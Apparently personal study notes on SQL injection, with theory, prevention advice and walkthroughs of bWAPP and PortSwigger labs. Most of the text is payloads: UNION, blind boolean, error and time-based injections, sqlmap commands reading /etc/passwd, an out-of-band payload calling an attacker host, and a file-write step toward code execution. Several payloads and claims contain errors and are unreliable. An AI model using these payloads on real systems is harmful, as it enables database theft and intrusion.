# 13. SQL Injection with BWAPP And PortSwigger

## Server-Side Vulnerabilitie

* These vulnerabilities exploit or execute malicious activities on the server or the server's operating system.
* Example: A client visits a website containing malformed/malicious code that triggers and executes on the server. This type of attack is known as Code Injection. Another example is Server Version Disclosure, which is also a server-side vulnerability.

## SQL Injection

### RDBMS

* Relation database management system.
* In these days everyone used Excel which has Tables (rows & Colum’s) that is similar to SQL.
* SQL is a programming language used to create, interact with, and request information from a database.
* RDBMS stands for Relational Database Management System.
* RDBMS is a program used to maintain a relational database.
* RDBMS is the basis for all modern database systems such as MySQL, Microsoft SQL Server, Oracle, and Microsoft Access.

#### SQL

* SQL is used by most web applications.
* For example, shopping websites use it a lot. Imagine the databases of an online clothing store.
* It likely contains a full inventory of all the items the company sells. Websites don't normally make users enter the SQL queries manually.
* Instead, they use things like menus, images, and buttons to show users information in a meaningful way.
* Example: when an online shopper clicks a button to add a sweater to their cart, it triggers a SQL query. The query runs in the background where no one can see it.
* An excellent example of how an SQL Service typically operates is the log-in process utilized for any user.
* Each time the user wants to log in, the web application sends the log-in page input (username/password combination) to the SQL Service, comparing it with stored database entries for that specific user.
* Suppose the specified username and password match any entry in the database. In that case, the SQL Service will report it back to the web application, which will, in turn, log the user in, giving them access to the restricted parts of the website.
* Post-log-in, the web application will set the user a special permission in the form of cookie or authentication token that associates his online presence with his authenticated presence on the website. This cookie is stored both locally, on the user's browser storage, and the webserver.
* Afterward, if the user wants to search through the list items listed on the page for something in particular, he will input the object's name in a search bar, which will trigger the same SQL Service to run the SQL query on behalf of the user.
* Suppose an entry for the searched item exists in the database, typically under a different table. In that case, the associated information is retrieved and sent to the web application to be presented to the user as images, text, links, and other types, such as comments and reviews.
* The reason websites use databases such as MySQL, MariaDB, or other kinds is that the data they collect or serve needs to be stored somewhere. Data could be usernames, passwords, posts, messages, or more sensitive sets such as PII (Personally Identifiable Information), Link: https://en.wikipedia.org/wiki/Personal\_data which is protected by international data privacy laws.
* Any enterprise with a disregard towards protecting its users' PII is welcomed with very hefty fines from international regulators and data privacy agencies.
* SQL Injection is a common way of exploiting web pages that use SQL Statements that retrieve and store user input data. If configured incorrectly, one can use this attack to exploit the well-known SQL Injection vulnerability, which is very dangerous.
* There are many different techniques of protecting from SQL injections, some of them being input validation, parameterized queries, stored procedures, and implementing a WAF (Web Application Firewall) on the perimeter of the server's network. However, instances can be found where none of these fixes are in place, hence why this type of attack is prevalent, according to the OWASP Top 10 list of web vulnerabilities. Link: https://owasp.org/www-project-top-ten/

### SQL Injection

* I never know from using the menus and buttons of a website, but sometimes those back inquiries are vulnerable to injection attacks.
* A SQL injection is an attack that executes unexpected queries on a database.
* Like cross-site scripting, SQL injection occurs due to a lack of sanitized input.
* The best way to defend against SQL injection is code that will sanitize the input.
* Developers can write code to search for specific SQL characters. This gives the server a clearer idea of what inputs to expect. One way this is done is with prepared statements.
* A prepared statement is a coding technique that executes SQL statements before passing them on to the database. When the user's input is unknown, the best practice is to use these prepared statements. With just a few extra lines of code, a prepared statement executes the code before passing it on to the server. This means the code can be validated before performing the query. Having well written code is one of the keys to preventing SQL injection.
* To perform the SQL Injection follow the BPI Which I called it Break, Patch, Inject.
* After the Break and Patch the Query find out number of Columns using ORDERBY Then Inject the Query.
* Where the attacker perform the query which lead to delete, modify the query which was not intended by developer.

### SQL injection categories

* There are three main categories of SQL injection:
  * In-band
  * Out-of-band
  * Inferential

#### In-band SQL injection

* The attacker blindly interacted with SQL Queries and communication is some channel and the data is presently directly in web application.
* In-band, or classic, SQL injection is the most common type. An in-band injection is one that uses the same communication channel to launch the attack and gather the results.
* Types:
  * Error Based SQL Injection
  * UNION Based SQL Injection

**Error Based SQL Injection:**

* It forces the database to generate an error, giving the attacker information upon which refine their injection.
* Where Web Application Reached the data and fetch with error created in SQL response will lead the threat actor know create malicious code.

**UNION Based SQL Injection:**

* Uses SQL UNION Operator to combine the results of two quires into a single results.
* Where Attacker used the SQL UNION operator to run unintended Query.
* For example, this might occur in the search box of a retailer's website that lets customers find products to buy. If the search box is vulnerable to injection, an attacker could enter a malicious query that would be executed in the database, causing it to return sensitive information like user passwords. The data that's returned is displayed back in the search box where the attack was initiated.

#### Out-of-band SQL injection

* That Consists of triggering an Out of Band network connection to system that control by attacker.
  * A Varity of Protocol can be used like DNS , HTTP.
  * ‘; exec master ….xp\_dirtree’//attackerwebsitecom’--+
* An out-of-band injection is one that uses a different communication channel to launch the attack and gather the results.
* For example, an attacker could use a malicious query to create a connection between a vulnerable website and a database they control. This separate channel would allow them to bypass any security controls that are in place on the website's server, allowing them to steal sensitive data.
* Note: Out-of-band injection attacks are very uncommon because they'll only work when certain features are enabled on the target server.

#### Inferential (Blind) SQL injection

* Where there is no actual transfer of data in web application.
* Attacker able to reconstruct the information by sending particular request and observe the result behaviour of the database.
* Takes Longer to Exploit.
* Inferential SQL injection occurs when an attacker is unable to directly see the results of their attack. Instead, they can interpret the results by analyzing the behavior of the system.

#### Types

**Boolean Based SQL Injection:**

* Uses Boolean Condition to Returning a different result depending on whether the query is TRUE OR FALSE Statement.
* Where the value entered response in Boolean value which is true or false, they can interpret the results by analysing the behaviour of the system which results in unintended data.

**Time Based SQL Injection:**

* It Relies on the database pausing for a specified amount of time then returning the results indicating a successful SQL Query Exaction.
* Where the value entered response will be in time, Wait for 10sec when response waited 10sec Which results Vulnerably
* For example, an attacker might perform a SQL injection attack on the login form of a website that causes the system to respond with an error message. Although sensitive data is not returned, the attacker can figure out the database's structure based on the error. They can then use this information to craft attacks that will give them access to sensitive data or to take control of the system.

### Injection Prevention

### BlackBox Testing Perspective

{% stepper %}
{% step %}
### Map the application

* Visits the URLs
  * Walked through all pages that accessible to me with the user context that I m running and make notes of all the input vector that potentially talks to the backend and understand how the application function.
  * Try to figure out logic of the application, Try to find subdomain in the application, Enumeration directory and pages for the request which is not visible to me backend they burpsuite listing.
  * Spend some time and time to understand how the application work and Map the input.
{% endstep %}

{% step %}
### FUZZ the application

* Input special character in the input vector and see if the application respond unusual way.
  * Submit Boolean condition such as ‘ or “ , and looks for errors or other anomalies.
* Submit payloads designed to trigger time delay when executed with in a SQL Query and look for difference in time taken to response.
* Submit Out-of-band payload to trigger out of band network interaction when executed with in a SQL Query and monitor for any resulting interaction.
{% endstep %}
{% endstepper %}

### White Box Testing

* Generate Loges.
  * Enable Web server logging.
  * Enable database logging.
* Map The Application.
  * Visible functionality in the application.
  * Regex search on all instance in the code that talk to the database.
* Code Review
  * Follow the code path for all input vectors
* Test any Potentials SQLi Vulnerability.

SQL queries are often programmed with the assumption that users will only input relevant information. For example, a login form that expects users to input their email address assumes the input will be formatted a certain way, such as jdoe@domain.com. Unfortunately, this isn’t always the case.

A key to preventing SQL injection attacks is to escape user inputs—preventing someone from inserting any code that a program isn't expecting.

### Exploiting SQL injection

* Exploiting Error Base SQL Injection.
  * Submit SQL-Specific characters such as ‘ or “ and looks for errors.
  * Different character can give different errors.
* Exploiting UNION Based SQL Injection Injection.
  * There are two rule of UNION operators.
  * The number and order of the columns must be same in all queries by ORDER BY and NULL values.
    * Incrementally inject a series of ORDER BY until get an error or observe a different behaviour .
      * ‘UNION SELECT ORDER BY 1 --+
      * ‘UNION SELECT ORDER BY 2 --+
      * ‘UNION SELECT NULL --+
      * ‘UNION SELECT NULL,NULL--+
  * The data type must be compatible.
  * Probe each colum to test whether it can hold string data by submitting series of UNION SELECT payloads that place string into each columns.
    * ‘UNION SELECT ‘a’,NULL --+
    * ‘UNION SELECT NULL,’a’--+
* Exploiting Boolean Based BLIND SQL Injection.
  * Submit a Boolean condition that evaluates to False and at the response.
  * Write a program that uses conditional Statement to ask the database a series of TRUE/False question and monitor response.
* Exploiting Time Based Blind SQL Injection.
  * Submit a payload that pauses the application for a specified period of time,
  * Write a program that uses conditional statement to ask the database a series of TRUE/FALSE question and monitor the response.
* Exploiting Out of Based SQL Injection
  * Submit payloads that designed to trigger and out of band network interaction when executed within an SQL Query.
  * Depending in SQL Injection use different method to exfil data.
* Automated Exploitable Tools.
  * SQLMAP
  * WEB APPLICATION VULNERABLE SCANNER.
* Least Privileges
  * The application should use the lowest possible level of privilege when accessing the database.
  * Any unnecessary default functionality in the database should be removed or disable.
  * Ensure CIS Benchmark for the database in use is applied.
  * All vendor-issued security patches should be applied in a time.

### SQL Injection to RCE

* It will be Channing of other vulnerability (File upload and File inclusion )
* Uploading File means Executing Files.
* READ >> LOAD\_FILE >> SQL Statement.
* Write >> Outfile\_file / dump file.
* Overwrite .>> can’t be replace or overwrite
* Upload >> through php code but the location is www because it is in web application.
* Identifying
  * Special Characterize (‘,”, | ,% c)
* Exploitation
  * Identify injection >> UNION.
  * Identify Injection >> Privileges Files. / load\_file () Function.
  * Write a file à into web hosting directory.

There are several ways to escape user inputs:

* Prepared statements: a coding technique that executes SQL statements before passing them on to a database
* Input sanitization: programming that removes user input which could be interpreted as code.
* Input validation: programming that ensures user input meets a system's expectations.
* Using a combination of these techniques can help prevent SQL injection attacks. In the security field, you might need to work closely with application developers to address vulnerabilities that can lead to SQL injections. OWASP’s SQL injection detection techniques is a useful resource if you’re interested in investigating SQL injection vulnerabilities on your own.

### Preventing SQL Injection

* Primary Defenses
  * Use of prepared statement (Parameterized Queries)
    * The application specific the query structure with placeholder for each user input.
    * The application specific the content of each placeholder.
  * Use of stored procedure (Partial)
    * A stored produce is a batch of statement grouped together and stored in the database while it should not be user controllable.
  * Whitelisting input Validation (Partial)
    * Define what value are authorized, everything else is considered unauthorized.
  * Escaping all user supplied input (Partial)
    * Should be only used as a last resort.
* Malicious SQL injection is a type of attack that executes unexpected queries on a database. Threat actors perform SQL injections to modify, delete, or steal information from databases. A SQL injection is a common attack vector that is used to gain unauthorized access to web applications. Due to the language's popularity with developers, SQL injections are regularly listed in the OWASP® Top 10 because developers tend to focus on making their applications work correctly rather than protecting their products from injection.
* Every bit of information that’s accessed online is stored in a database. A database is an organized collection of information or data in one place. A database can include data such as an organization's employee directory or customer payment methods. In SQL, database information is organized in tables. SQL is commonly used for retrieving, inserting, updating, or deleting information in tables using queries.
* A SQL query is a request for data from a database. For example, a SQL query can request data from an organization's employee directory such as employee IDs, names, and job titles. A human resources application can accept an input that queries a SQL table to filter the data and locate a specific person. SQL injections can occur anywhere within a vulnerable application that can accept a SQL query.
* Queries are usually initiated in places where users can input information into an application or a website via an input field. Input fields include features that accept text input such as login forms, search bars, or comment submission boxes. A SQL injection occurs when an attacker exploits input fields that aren't programmed to filter out unwanted text. SQL injections can be used to manipulate databases, steal sensitive data, or even take control of vulnerable applications.

#### Wildcard Of SQL

The Search Box in Beebox Uses the Wildcard.

* The Backend Quires is like # Select title form movies Where title LIKE “%the%”
* The % means Anything

#### Finding Injection in BWAPP

* The Tables is title because its visible in URL
* First Unbalance the Quires
* To Unbalance the Queries Used by Single quotes or Double Quote which mostly Refelected with an error. But it depend if the server end enable the Error Logs.
* Now need to balance the queries to put custom SQL Injection.
* Which is “Plus, space, space, plus”
* Note: This will affect only in Web.
* Backend.
  * ; PLUS Minus Minus Plus
* Now The Queries is balanced.

#### SQL Injection On BWAPP

* Backend

#### Summary

* To SQL Injection there are operator Which is
  * Stacked Q
  * Union Q
  * Boolein
  * Time Based
* Orderby Statement to Verify how many columns are there
  * UNION Queries
* The UNION operator combine two or more SELECT Statement. Or two Queries.
  * But the condition is Every SELECT Statement in UNION have the same Number of Columns.
* Once Know the Columns How Many Columns number is there Use the number 1,2,3 till know.
* The Queries will be like :-
  * SELECT \* from tables where ColumsNumber1
  * UNION
  * Select 1,2,3 form tables
* Using the Orderby to verify the colums
  * Double or Single Quote : Order space by space 1 minus minus space

#### UNION BASED On BWAPP

* If the queris didn’t give an error Means the Queries works.
* Change the order by number until the error comes.
* There are five colums shown and two colume hiden.
* This means there is no 8 number of Colums.
* Now replace order by with the UNION

http://localhost/bWAPP/sqli\_1.php?title=%27order+by+8--+\&action=search

* UNION

http://localhost/bWAPP/sqli\_1.php?title=%27union+select+1,2,3,4,5,6,7--+\&action=search

* Get the response alog with the given input , this number are the injection point.
* Use the injection point to inject the sql os command in bracket.

http://localhost/bWAPP/sqli\_1.php?title=%27union+select+1,2,3,4,%28user%28%29%29,6,7--+\&action=search

* Now in this injection point its can inject any SQL Queries.

http://localhost/bWAPP/sqli\_1.php?title=%27union+select+1,2,3,4,%28select+%22Shadow%22%29,6,7--+\&action=search

* Query for founding Database, tables, versions.

http://localhost/bWAPP/sqli\_1.phptitle=%27UNION%20SELECT%201,table\_name,database%28%29,4,version%28%29,6,7%20from%20information\_schema.tables--+\&action=search

* Now founding the columns

http://localhost/bWAPP/sqli\_1.php?title=%27UNION%20SELECT%201,group\_concat%28column\_name%29,3,4,5,6,7%20from%20information\_schema.columns%20where%20table\_name=%27movies%27--+\&action=search

* And got the users column.

http://localhost/bWAPP/sqli\_1.php?title=%27UNION%20SELECT%201,group\_concat%28column\_name%29,3,4,5,6,7%20from%20information\_schema.columns%20where%20table\_name=%27users%27--+\&action=search

* Now founding the users column data .
* Note : only three column data is allowed.

http://localhost/bWAPP/sqli\_1.php?title=%27UNION%20SELECT%201,group\_concat%28login,password,email%29,3,4,5,6,7%20from%20users--+\&action=search

* This Task can be Automated by SqlMap
* This Beebox Required Authentication of login which can used by Cookie
* Sqlmap : which automated the SQL injection
* -u : host / target
* \--cookie :CookieID which is “Name=Value;Name=value”
  * technique: The Technique \[=name]
* \--dbs : getting the database
* \--batch : no waiting for prompt takes by default yes.

### SQLMAP

#### Techniques of SQLMAP

* UNION è It Use UNION Operator to inject query
* Boolean è it will be Blind technique è return value True Or False è Hey Database do you have 4 colums then return True.
  * In True Statement its return some value .
  * In False statement it will not return any value.
* True statement example:-

http://localhost/bWAPP/sqli\_1.php?title=%27and%201=1%20--+\&action=search

* False Statement

http://localhost/bWAPP/sqli\_1.php?title=%27and%201=2%20--+\&action=search

#### Automated Boolean Based

#### Automated TIME BASED

* Time Based è hey databased if your table/colume name start with a then wait for 5sec if it wait that means the table/colum start with a

Manul

#### Stacked Query & Automated Stacked Query

* Stacked Query è it adding semi columns and specifying the next query.

#### Error Based & Automated Error Based

Error Based è hey database try to get ABC table and if return an error with combine of an actucal output.

Automated

\--users : try to ask for users

sqlmap -u 'http://192.168.100.153/bWAPP/sqli\_1.php?title=a\*\&action=search' --cookie "PHPSESSID=9f9916e69c4f26ce6a23c4f497a8202e;security\_level=0" --technique=E --users --dbs --batch -v 4

#### SQL Injection GET/SELECT

* In this it has a drop down option rather the the query
* The are 7 movies with 7 selector but when its 0 means null
* Union Based and verify the database and user by function

#### SQLMAP Automated UNION Based

sqlmap -u 'http://192.168.100.153/bWAPP/sqli\_1.php?title=a\*\&action=search' --cookie "PHPSESSID=9f9916e69c4f26ce6a23c4f497a8202e;security\_level=0" --technique=U –union-colm –file-read /etc/passwd --dbs --batch -v 4

#### SQL to RCE

* It may be chaning with other vulnerablilties like File inclusion or File upload.
* Uploading a file means Executing a File.
  * To Execute a file there are SQL Function which is.
  * To read a file the function is Load\_file(“whatever you want to load”).
  * To Write a file the fuction is outfile OR dumpfile.
  * There is no overwriting a file in SQL.
* Got some data reflected which mean that there is some file permissons which reflected the data so that means that user has File\_priv in the Database.
* Inject the code in UNION method which is http://target.com/?search=random+union+select+1,(select “Injected Value”),3,4,5,6,7+into+dumpfile ‘/tmp/test’--+-
* The error will be normal and it can be double check by refreshing and the error will show the file already exists.

#### Summary

* Phase 1 – Identify special characters.
  * Identify the Special characters which is single quote, double quote, percentage , open bracket and close bracket ,
  * Break and patch the query
* Phase 2 - Exploitation
  * Identify number of Colum \[OrderBy].
  * Identify the Injection point \[UNION Method].
  * Identity the privillege Files, \[Load\_Files() Function].
  * Write a file into web hosting directory.

### PortSwigger Validatoin

#### SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

* Comment of the Query
* Use the OR Statement and Boolean Statement if 1=1
* To get all the unreleased and released product list

### SQL injection vulnerability allowing login bypass

### SQL injection attack, querying the database type and version on Oracle

#### SQL injection UNION attack, finding a column containing text

* SQL injection UNION attack, finding a column containing text
  * UNION Opeartion has two rules
* The number and order of column must be in same queris.
* Data mus tbe compatable.
* Analayies.
* in this First break the Query by '
* after breack patch by commenting --+
* Put the SQl injection in that '+UNION+SELECT+NULL--+
* If Error occure then the UNION operator doesn't match.
* repeat the same process.
* '+UNION+SELECT+NULL,+NULL
* Again error occure but in the output i can see two tables. there must be one table hidden which will be id something.
* '+UNION+SELECT+NULL,+NULL,+NULL
* Now to seee which column print string
* '+UNION+SELECT+'String',+NULL,+NULL
* got an Error
* Now with the Column 2
* '+UNION+SELECT+NULL,'String',+NULL
* Got it

### SQL injection attack, querying the database type and version on MySQL and Microsoft

### SQL injection attack, listing the database contents on non-Oracle databases

' UNION SELECT NULL,version()--+

' UNION SELECT NULL,table\_name FROM information\_schema.tables-- -

' UNION SELECT NULL,column\_name FROM information\_schema.columns WHERE table\_name='users\_ppbboo'-- -

' UNION SELECT NULL,username\_ulcrbo||':'||password\_rkvgru FROM users\_ppbboo-- -

administrator:s0jfpqn46cdmx6da0kbj

wiener:ep4gdgfssbno6tisfk9y

carlos:gttjvfkpuc0d2r6qv9nv

### SQL injection attack, listing the database contents on Oracle

' UNION SELECT NULL,column\_name FROM all\_tab\_columns WHERE table\_name='USERS\_VQWSBZ'--+

' UNION SELECT NULL,USERNAME\_NNSAGX||':'||PASSWORD\_RTXYJD FROM USERS\_VQWSBZ --+

administrator:cur5zrg66qlphjejoq79

carlos:0swt80k5da3dmh7bf9ys

wiener:3z3xgy9h2lddgt4e24nf

#### SQL injection UNION attack, determining the number of columns returned by the query

* SQL injection UNION attack, determining the number of columns returned by the query
  * UNION Opeartion has two rules
* The number and order of column must be in same queris.
* Data mus tbe compatable.
* in this First break the Query by '
* after breack patch by commenting --+
* Put the SQl injection in that '+UNION+SELECT+NULL--+
* If Error occure then the UNION operator doesn't match.
* repeat the same process.
* '+UNION+SELECT+NULL,+NULL
* Again error occure but in the output i can see two tables. there must be one table hidden which will be id something.
* '+UNION+SELECT+NULL,+NULL,+NULL
* GOT IT

### SQL injection UNION attack, finding a column containing text

#### SQL injection UNION attack, retrieving data from other tables

' UNION SELECT NULL,table\_name FROM information\_schema.tables--+

' UNION SELECT NULL,column\_name FROM information\_schema.columns WHERE table\_name='users'-- -

' UNION SELECT username,password FROM users-- -

carlos

y3c6asassid4tb5s28cl

wiener

5bfxvrolic4kkvfkhxu4

administrator

6a9pjbiyxe9t7op4jvxv

#### SQL injection UNION attack, retrieving multiple values in a single column

Try this password for administrator one of them will be valiad and another way is concatenating.

administrator:vx439nrhzvyq2jls7ied

wiener:pn4fv01k7jnmdbao2a63

carlos:b80oby6mjxytgv5pxhnv

#### SQL injection attack, querying the database type and version on MySQL and Microsoft

#### SQL injection attack, listing the database contents on non-Oracle databases

SQL injection attack, listing the database contents on non-Oracle databases

* UNION Opeartion has two rules

The number and order of column must be in same queris.

Data mus tbe compatable.

Analayies.

in this First break the Query by '

after breack patch by commenting --+

Put the SQl injection in that '+UNION+SELECT+NULL--+

If Error occure then the UNION operator doesn't match.

repeat the same process.

'+UNION+SELECT+NULL,+NULL

Again error occure but in the output i can see two tables. there must be one table hidden which will be id something.

'+UNION+SELECT+NULL,+NULL,+NULL

Now to seee which column print string

'+UNION+SELECT+'String',+NULL,+NULL

got an Error

Now with the Column 2

'+UNION+SELECT+NULL,'String',+NULL

Got it

Where the string is here in the lab i know there is users tables.

'+UNION+SELECT+user,+password+form+user--+

inshort select username and password from user.

Check the string which string is responseing.

'UNION+SELECT+NULL,+username+form+users--+

The 1st column Define error, the 2nd Column reflect the response to solve this need to concatinate in oracle this is the syntax for concaninating '||'\~'||'

to view the database cammands its depends of Different vendous.

\#show databases.

Information.schema is the value to print or set of views in database

it can be tables or columns.

information\_schema.tables || information\_schema.colums

'UNION+SELECT+table\_name+NULL+information\_schema.tables--+

there are many tables and filter the user column

'UNION+SELECT+column\_name+,+NULL+from+information\_schema.columns+where+table\_name='users\_dvabvy'--

now know the users tables find the colums in users tables.

'+UNION+SELECT+column\_name,+NULL+FROM+information\_schema.columns+WHERE+table\_name='users\_dvabvy'--

password\_ysinqb

username\_dvjruq

#### Blind SQL injection with conditional responses

Target is to get administrator login.

The lab says there is a vuln in TrackingID , if don’t know then latterly FUZZING every parameter that talks to backends, after Fuzzing figure out if it vulnerable or not.

* If the Trackingid exists there will be a welcome back message.
* If not there is TrackingID tramperd there will be no welcome back meassge.
* To confirm to blind SQLi have to enforce the TRUE use case and False use case.

Backend

Example TRUE:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and 1=1 (which means the trackingID is TRUE and register in Server and 1=1 )

Example False :- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and 1=1 (which means the trackingID is TRUE and register in Server and 1=1 )

Now It confirm this is Vulnerable to blind SQLi

* To get the Administrator Login need to first know where is the administrator account is there and in which tables
* Mostly its there is users tables
* Confirm if the user tables Exists.

Query

‘ and (select ‘string’ from user LIMIT 1) = ‘string’--

To Confirm if administrator user exists in users tables.

Query

‘and (select username from users where username=’administrator’)=‘administrator’

The administrator user exists in users tables.

And the hasan username doesn’t exists in user tables 🙁

Get the password of the administrator User.

Ask the server true and false question to get the administrator password.

Query

‘ and (select password from users where username=’administrator’)=’hasan’

SO the password is not hasan

Query for length of password

‘ and (select username from users where username=’administrator’ and LENGTH(password)>1 )=’administrator’--’

The password is bigger than 1

So the password length is bigger the 1 and smaller the 20

Intruder to identify the length of password

Till 19 length got the welcome back message which means the password is greater the 19

So the exact password is 20 length.

Confirm the password.

Query

‘ and (select substring(password,1,1) from users where username='administrator') = 'a'--

'password' column starting from the first character (1) and having a length of 1.

Check if the first character is a and if yes then response with welcome back if not then don’t response.

Intruder sniper

So the first Character of password is ‘i’

Cluster bombing

1 payload is with number till 20 because it has 20 lenth of password.

2 payload is with brute forces which test out all the alpha numeric charaters

So the password is i33o6830z48gwjf9g9k6

Note:-

Blind SQL injection with conditional responses

Target :- adminitrator Login.

Given:- There is a vulnerable parameter in TrackingID

The lab says there is a vuln in TrackingID , if don’t know then latterly FUZZING every parameter that talks to backends, after Fuzzing figure out if it vulnerable or not.

Refreshing the page or going somewhere will reflect a welcome back message .

Because that TrackingId is regiester in Backend.

Get the requests in Burp.

Confirm that the parameter to blind.

Backend

Example:- Select tracking-id form tracking-table where trackingid='uwnlIpssu9HFULRe'

To confirm to blind SQLi have to enforce the TRUE use case and False use case.

Backend

Example TRUE:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and 1=1 (which means the trackingID is TRUE and register in Server and 1=1 )

Example False :- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and 1=1 (which means the trackingID is TRUE and register in Server and 1=1 )

Confirm if the user tables exists.

Add a subquery.

Example TRUE:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and

(select 'H' form users LIMIT 1) = 'H'--

Confirm if ther administrator user is in usertable.

Example TRUE:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and

(select username from users where username='administrator') = 'administrator'--

Ask the server true and false question to get the administrator passowrd.

Confirm the administrator password

Example TRUE:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and

(select password from users where username='administrator') = 'hasan'--

Example TRUE of length of password:- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and

(select username from users where username='administrator' and LENGTH(password)>1) = 'administrator'--

Confirm the password.

Example TRUE using substring the function is used to extract a part of a string :- Select tracking-id from tracking-table where trackingid='uwnlIpssu9HFULRe' and

(select substring(password,1,1) from users where username='administrator') = 'a'--

So the first charaster is 'i'

Two payloads

1 payload for number to know which number has alpha charaster

2 payload for alpha charater

query

'+and+ (select+substring(password,§1§,1)+from+users+where+username%3d'administrator')+%3d+'§a§'--';

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

i 3 3 o 6 8 3 0 z 4 8 g w j f 9 g 9 k 6

i33o6830z48gwjf9g9k6

Blind SQL injection with conditional responses

### Blind SQL injection with conditional errors

’

Blind SQL injection with conditional errors with oracle databasae

* break the query using error base
* ' but got thre 200 response not the internal error
* So it means the database is form different vendous.

Got the 500 error because oracle database need a cause statement like select , from etc to be a valid query, that confirm that this an oracle database.

* There is a dummy table is oracle which is dual

Check false tables to Get Error.

Confirm that User tables exists.

* Got the error
* Got the error because there are more then one rows of users tables. To prevent that use LIMIT in oracle is ROWNUM and the value. This means users tables exists.

Confirm if the administrator username is there in user’s tables.

User hassan which doesn’t exists.

Find the length of the password of user administrator

The output of password length greater then 1

The password length is greater the 1.

The output of password length greater then 30

The password is less then 30.

Intruder setting.

So the password is 20 characters because is greater than 19 length but not greater then 20 length.

Find the password of username ‘administrator’

The first letter is not ‘a’

Intrude setting for finding the first letter.

Output

So the first letter is ‘q’

Intruder setting to find the password of administrator

.Output

So the password is ‘qra2csxj2zeuts3g54yh

Results :

Notes

Blind SQL injection with conditional errors

Goal :- Administrator login

Analysis:

break the query using error base

' but got thre 200 response not the internal error

So it means the database is form different vendous.

'||(SELECT '')||'

Got the 500 response.

may a oracle database because it need a form cause in order the query to be valid.

'|| select '' from dual) || ' --> dual is just a dumy table.

'|| select '' from hasan) || ' --> got the error which confirm is useing oracel database.

Confirm that username adminitrtor is there in users tables.

'|| (select '' from users) || ' --> got the 500 error

LIMIT the output

'||(select '' from users where rownum = 1)||' --> the user tables exists.

Confirm administrator Exists.

'|| (select '' from users WHERE username = 'administrator') || ' --> if the user exixt or not this statement will get 200

to confirm that

If the case is 1=1 then porframce satern function then perfrom something else form dual because oracele database.

so here TO\_CHAR is an oracle function which convert a number or a date to string

'||(select CASE WHEN (1=1) THEN \_ ELSE) || '

'||(select CASE WHEN (1=1) THEN TO\_CHAR (1/0) ELSE '' END FROM dual) --> when 1=1 which will be true then perfrom this TO\_CHAR function with this invalid parameter so gets an error

and if the 1=0 which is not a true statement then its goes to else statemenet where this parameter is empty for now.

so the 1=1 --> get an error

the 1=0 --> got 200 response.

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'

So the order os SQL Execution is the form clause is evaluated first before the Select clause

in thiis case from users table where = administrator if the username exits the database the perfome the select section of that query

if the username doesn't exits the select section will not be perform.

Afer the form clause when its goees to select section

This case 1=1 true then is goes to

TO\_CHAR 1/0 will generate an error

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||' --> internal server error means administrator exists

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='hasan')||' --> Got 200 response means user doesn'r exists why because the select section is not run because user tables doesn't have hasan.

Find the lenth of password

use the AND query like and LENGTH(password)>1

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' AND LENGTH(password)>1)|| --> get an error Obviously because the password cannot be zero

intruder

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') AND LENGTH(password)>19)||' --> got an error which is its bigger the 19

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator') AND LENGTH(password)>20)||' --> got an 200 response means is not bigger then 20

So this means the password is 20 Charaters

FIND The administrator password using substring

substr(password,1,1)='a'

'||(SELECT CASE WHEN (1=1) THEN TO\_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator' AND substr(password,1,1)='a')||'

first letter is a --> if is 'a' then got an error if this not then got the 200 response.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20

q r a 2 c s x j 2 z e u t s 3 g 5 4 y h

qra2csxj2zeuts3g54yh

#### Visible error-based SQL injection

Break the query and patch the malicious input.

Got the error because the AND condition is not Boolean.

So 1 = and the query.

* Confirm the users tables and administrator username.

Got the error

Balance the query

Confirm the administrator exists in users tables

Notes:-

Visible error-based SQL injection

Goal :- Administrator login

Analyis :-

the tracking id Parameter is where its Vulnerable to SQLi

CAST is a function which converts in data types.

using this function which help convert string into intergers which results an errror which revealts the unintended SQ Queries.

using CAST and subquery to get an error which results information.

CAST:-

'CAST (AS int)

subquery with CAST

'CAST ((SELECT 1)AS int)

With AND operator

' AND CAST ((SELECT 1)AS int)--+

Got an error to fix that used the boolean 1=CAST

' AND 1=CAST ((SELECT 1)AS int)--+

Now the query is valid.

confirm the user tables & Username administrator.

'AND 1= CAST ((SELECT usersname from user)AS int)--+

Got the error may be because there are many query.

'AND 1=CAST ((SELECT usersname from users LIMIT 1)AS int)--+

### Blind SQL injection with time delays

#### Blind SQL injection with time delays and information retrieval

Confirm is this is vulnerable

* As it seems its take 20 sec to response it is vulnerable.
* Ask Boolean question to get the administrator password of bases of waiting 10 second if its true.
* Confirm the users tables,
* Its waited 10 sec means the users tables exists
* 1=0 which is false statement
* Confirm the administrator exists in users tables.
* Its sleep 10 seconds means its exits.
* Enumerate the password of administrator.
* Its respone after 10 seconds which Means password is greater then 1
* its response before 10 seconds which means its greater then 20
* its response after 10 seconds which means its greater then 19 which means its 20 characters.

Intruder setting.

* Results

Finding the password

The password first letter is not ‘a’.

Intruder setting

* The first letter is ‘q’

Intruder setting.

Results:

Notes

Blind SQL injection with time delays and information retrieval

Goal :- Login as administrator.

Analyis:-

Got to know it vulnerable to timebased in oracle database.

Confirm that

' || pg\_sleep(10)--

Confirm the users tables is there.

' || (select case when (1=1) then pg\_sleep(10) else pg\_sleep(-1)end)--

Confirm the administrator username in users tables.

' || (select case when (username='administrator') then pg\_sleep(10) else pg\_sleep(-1) end from users)--

Enumerate the password.

